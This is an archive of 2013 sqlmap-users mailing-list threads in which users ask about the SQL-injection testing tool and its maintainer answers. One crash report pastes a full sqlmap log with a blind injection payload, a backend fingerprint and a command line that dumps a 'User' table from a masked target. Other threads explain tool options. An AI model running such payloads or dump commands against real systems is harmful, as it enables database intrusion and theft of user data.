On Tue, Jul 2, 2013 at 2:27 PM, Jacco van Tuijl <jac...@gm...>wrote:

> [14:26:08] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: answer
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: answer=Fpxn) AND 3085=3085 AND
> (7792=7792&method=1&step=HVWK&prevstep=1&allanswers=JoKh&productpagenr=
> ---
> [14:26:09] [INFO] the back-end DBMS is Oracle
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Oracle
> [14:26:09] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) entries
> [14:26:09] [INFO] fetching current database
> [14:26:09] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [14:26:09] [INFO] retrieved:
> [14:26:10] [WARNING] reflective value(s) found and filtering out
>
> [14:26:14] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [14:26:14] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) columns
> [14:26:14] [INFO] fetching current database
> [14:26:14] [INFO] retrieved:
> [14:26:19] [INFO] fetching columns for table 'USER' in database 'None'
>
> [14:26:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5882ab5, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-5882ab5
> Python version: 2.6.5
> Operating system: posix
> Command line: sqlmap.py -u
> ************************************************ --dbms=oracle --data
> answer=&method=1&step=&prevstep=1&allanswers=&productpagenr= --level=5
> --risk=3 --dump -T User --exclude-sysdb --batch --fresh-queries
> Technique: BOOLEAN
> Back-end DBMS: Oracle (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "/usr/src/sqlmap-dev/lib/controller/controller.py", line 576, in
> start
>     action()
>   File "/usr/src/sqlmap-dev/lib/controller/action.py", line 127, in action
>     conf.dbmsHandler.dumpTable()
>   File "/usr/src/sqlmap-dev/plugins/generic/entries.py", line 104, in
> dumpTable
>     self.getColumns(onlyColNames=True)
>   File "/usr/src/sqlmap-dev/plugins/generic/databases.py", line 600, in
> getColumns
>     query = rootQuery.blind.count %
> (unsafeSQLIdentificatorNaming(tbl.upper()),
> unsafeSQLIdentificatorNaming(conf.db.upper()))
> AttributeError: 'NoneType' object has no attribute 'upper'
>
>
> Kind regards,
> Jacco van Tuijl
>
>
> ------------------------------------------------------------------------------
> This SF.net email is sponsored by Windows:
>
> Build for Windows Store.
>
> http://p.sf.net/sfu/windows-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] CRITICAL - unhandled exception in sqlmap/1.0-dev-5882ab5 (current trunk)

[Jacco v. T. <jac...@gm...>]

[14:26:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: answer
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: answer=Fpxn) AND 3085=3085 AND
(7792=7792&method=1&step=HVWK&prevstep=1&allanswers=JoKh&productpagenr=
---
[14:26:09] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[14:26:09] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[14:26:09] [INFO] fetching current database
[14:26:09] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[14:26:09] [INFO] retrieved:
[14:26:10] [WARNING] reflective value(s) found and filtering out

[14:26:14] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[14:26:14] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) columns
[14:26:14] [INFO] fetching current database
[14:26:14] [INFO] retrieved:
[14:26:19] [INFO] fetching columns for table 'USER' in database 'None'

[14:26:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5882ab5, retry
your run with the latest development version from the GitHub repository. If
the exception persists, please send by e-mail to '
sql...@li...' or open a new issue at '
https://github.com/sqlmapproject/sqlmap/issues/new' with the following text
and any information required to reproduce the bug. The developers will try
to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-5882ab5
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py -u ************************************************
--dbms=oracle --data
answer=&method=1&step=&prevstep=1&allanswers=&productpagenr= --level=5
--risk=3 --dump -T User --exclude-sysdb --batch --fresh-queries
Technique: BOOLEAN
Back-end DBMS: Oracle (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "/usr/src/sqlmap-dev/lib/controller/controller.py", line 576, in
start
    action()
  File "/usr/src/sqlmap-dev/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/usr/src/sqlmap-dev/plugins/generic/entries.py", line 104, in
dumpTable
    self.getColumns(onlyColNames=True)
  File "/usr/src/sqlmap-dev/plugins/generic/databases.py", line 600, in
getColumns
    query = rootQuery.blind.count %
(unsafeSQLIdentificatorNaming(tbl.upper()),
unsafeSQLIdentificatorNaming(conf.db.upper()))
AttributeError: 'NoneType' object has no attribute 'upper'


Kind regards,
Jacco van Tuijl

Re: [sqlmap-users] sqlmap log file

[Miroslav S. <mir...@gm...>]

p.s. just in case, try to rerun with
A) --union-char=1
B) --text-only

p.p.s. if everytime you have a different number in "appears to be UNION
injectable with x columns" then the page "dynamicity" is screwing you up


On Fri, Jun 28, 2013 at 10:24 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi Heidi.
>
> 1) appears != is. I am not sure if there is much explanation here to be
> done. To sqlmap something "appeared" to be injectable (because of our
> heuristic mechanisms) and in further MORE SERIOUS testing it concluded that
> "it is not injectable"
> 2) New info is being logged, but only data from "is injectable" cases
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Jun 28, 2013 at 7:35 AM, Heidi Petersen <hei...@gm...>wrote:
>
>> Hello! New to sqlmap and I'm running some long tests, but I have a few
>> questions.
>>
>> I'm seeing
>> [INFO] target URL appears to be UNION injectable with x columns
>> and then
>> [WARNING] GET parameter 'xxxxxxx' is not injectable
>>
>> there is nothing in the log file.
>>
>> So two questions:
>> 1)if it seemed injectable but then ran further tests,  why does it say
>> it's injectable and then that parameter isn't?
>> 2)I ran this with a lower level earlier in the day on the same target.  I
>> didn't replace the log file.  Is the new info being logged or am I losing
>> this info?
>>
>> Much appreciated,
>> Heidi
>>
>>
>>
>> ------------------------------------------------------------------------------
>> This SF.net email is sponsored by Windows:
>>
>> Build for Windows Store.
>>
>> http://p.sf.net/sfu/windows-dev2dev
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] sqlmap log file

[Miroslav S. <mir...@gm...>]

Hi Heidi.

1) appears != is. I am not sure if there is much explanation here to be
done. To sqlmap something "appeared" to be injectable (because of our
heuristic mechanisms) and in further MORE SERIOUS testing it concluded that
"it is not injectable"
2) New info is being logged, but only data from "is injectable" cases

Kind regards,
Miroslav Stampar


On Fri, Jun 28, 2013 at 7:35 AM, Heidi Petersen <hei...@gm...>wrote:

> Hello! New to sqlmap and I'm running some long tests, but I have a few
> questions.
>
> I'm seeing
> [INFO] target URL appears to be UNION injectable with x columns
> and then
> [WARNING] GET parameter 'xxxxxxx' is not injectable
>
> there is nothing in the log file.
>
> So two questions:
> 1)if it seemed injectable but then ran further tests,  why does it say
> it's injectable and then that parameter isn't?
> 2)I ran this with a lower level earlier in the day on the same target.  I
> didn't replace the log file.  Is the new info being logged or am I losing
> this info?
>
> Much appreciated,
> Heidi
>
>
>
> ------------------------------------------------------------------------------
> This SF.net email is sponsored by Windows:
>
> Build for Windows Store.
>
> http://p.sf.net/sfu/windows-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] sqlmap log file

[Heidi P. <hei...@gm...>]

Hello! New to sqlmap and I'm running some long tests, but I have a few
questions.

I'm seeing
[INFO] target URL appears to be UNION injectable with x columns
and then
[WARNING] GET parameter 'xxxxxxx' is not injectable

there is nothing in the log file.

So two questions:
1)if it seemed injectable but then ran further tests,  why does it say it's
injectable and then that parameter isn't?
2)I ran this with a lower level earlier in the day on the same target.  I
didn't replace the log file.  Is the new info being logged or am I losing
this info?

Much appreciated,
Heidi

Re: [sqlmap-users] Parameter "from-to"

[Dennis <kor...@ya...>]

Maybe I don't understand your case completely, but wouldn't --prefix and
--suffix help here? E.g.
--prefix="firstvalue:" --suffix=":12"

Cheers,
Dennis

Am 24.06.2013 16:36, schrieb Miroslav Stampar:
> Hi.
>  
> There is a --param-del option, but in your case --param-del=":" would
> do more harm than good. It separates pairs (parameter=value), but in
> your cases there is no clear separation for doing such thing.
>  
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Jun 24, 2013 at 3:33 PM, Sebastian Nerz
> <seb...@sy... <mailto:seb...@sy...>> wrote:
>
>     Hi,
>
>     my apologies, if the question is covered in the documentation, but I
>     could not find anything.
>
>     Does SQLMAP support providing parameter limits? An example:
>
>     param=firstvalue:MTIz:12
>     decoded:
>     param=firstvalue:123:12
>
>     I'd love to e.g. use base64encode. but for this I would have to be
>     able
>     to tell SQLMAP the delimiters or start- and endpositions (e.g.:
>     param=firstvalue:#123*:12, where the parameter would be 123)
>
>     All the best,
>
>     Sebastian Nerz
>
>
>
>     ------------------------------------------------------------------------------
>     This SF.net email is sponsored by Windows:
>
>     Build for Windows Store.
>
>     http://p.sf.net/sfu/windows-dev2dev
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> This SF.net email is sponsored by Windows:
>
> Build for Windows Store.
>
> http://p.sf.net/sfu/windows-dev2dev
>
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Parameter "from-to"

[Miroslav S. <mir...@gm...>]

Hi.

There is a --param-del option, but in your case --param-del=":" would do
more harm than good. It separates pairs (parameter=value), but in your
cases there is no clear separation for doing such thing.

Kind regards,
Miroslav Stampar


On Mon, Jun 24, 2013 at 3:33 PM, Sebastian Nerz <seb...@sy...>wrote:

> Hi,
>
> my apologies, if the question is covered in the documentation, but I
> could not find anything.
>
> Does SQLMAP support providing parameter limits? An example:
>
> param=firstvalue:MTIz:12
> decoded:
> param=firstvalue:123:12
>
> I'd love to e.g. use base64encode. but for this I would have to be able
> to tell SQLMAP the delimiters or start- and endpositions (e.g.:
> param=firstvalue:#123*:12, where the parameter would be 123)
>
> All the best,
>
> Sebastian Nerz
>
>
>
>
> ------------------------------------------------------------------------------
> This SF.net email is sponsored by Windows:
>
> Build for Windows Store.
>
> http://p.sf.net/sfu/windows-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm